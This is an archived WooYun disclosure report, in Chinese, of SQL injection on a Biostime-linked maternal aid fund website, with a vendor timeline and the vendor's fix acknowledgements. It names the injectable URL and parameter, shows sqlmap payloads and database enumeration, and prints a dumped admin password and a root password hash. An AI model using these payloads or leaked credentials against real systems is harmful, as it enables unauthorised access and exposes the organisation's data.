乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-07-19: 细节已通知厂商并且等待厂商处理中 2015-07-20: 厂商已经确认,细节仅向厂商公开 2015-07-30: 细节向核心白帽子及相关领域专家公开 2015-08-09: 细节向普通白帽子公开 2015-08-19: 细节向实习白帽子公开 2015-09-03: 细节向公众公开
合生元旗下某站SQL注入漏洞(root权限)
001x 问题出在这个站点http://www.babycarefund.org/版权所有中国红十字基金会-合生元母婴救助基金通过查询可知该站和合生元在一个IP上
002x 注入点
http://www.babycarefund.org/news.php?classid=7 (GET)
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: classid Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: classid=7 AND 5915=5915 Vector: AND [INFERENCE] Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: classid=7 AND SLEEP(5) Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])---[09:42:34] [INFO] the back-end DBMS is MySQLweb application technology: Nginx, PHP 5.4.14back-end DBMS: MySQL 5.0.11
available databases [6]:[*] biostimeqma[*] information_schema[*] jijinhui[*] mysql[*] sujia[*] test
当前数据库
Database: jijinhui+----------------+---------+| Table | Entries |+----------------+---------+| w_apply | 6825 |-----基金申请| w_region | 3027 || w_question | 738 || w_document | 454 || w_news | 158 || w_country | 34 || w_menu | 27 || w_product | 18 || w_webbanner | 10 || w_webcontent | 8 || w_newsclass | 6 || w_productclass | 6 || w_type | 5 || w_class | 3 || w_newstype | 3 || w_media | 2 || w_message | 2 || w_area | 1 || w_smtpconfig | 1 || w_user | 1 |+----------------+---------+
Database: jijinhuiTable: w_user[1 entry]+------+------+--------+------------+-----------+------------+----------------+| c_id | u_id | u_name | u_date | u_content | u_username | u_password |+------+------+--------+------------+-----------+------------+----------------+| 1 | 1 | admin | 2010-04-01 | 1 | admin | babycarefund07 |
database management system users password hashes:[*] root [1]: password hash: *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
仅此一个账户,密码解密为 root网络太渣就不继续深入了,证明即可
危害等级:低
漏洞Rank:5
确认时间:2015-07-20 14:53
非常感谢路人甲的发现,我们已在积极处理中。
2015-07-27:漏洞修正中,突然发现,最早系统显示发现者是路人甲,现在变成了Ton7BrEak。不过还是感谢此漏洞的发现者,谢谢。
2015-08-25:非常感谢Ton7BrEak的漏洞提示,我们已经对此漏洞进行修复,谢谢您的贡献。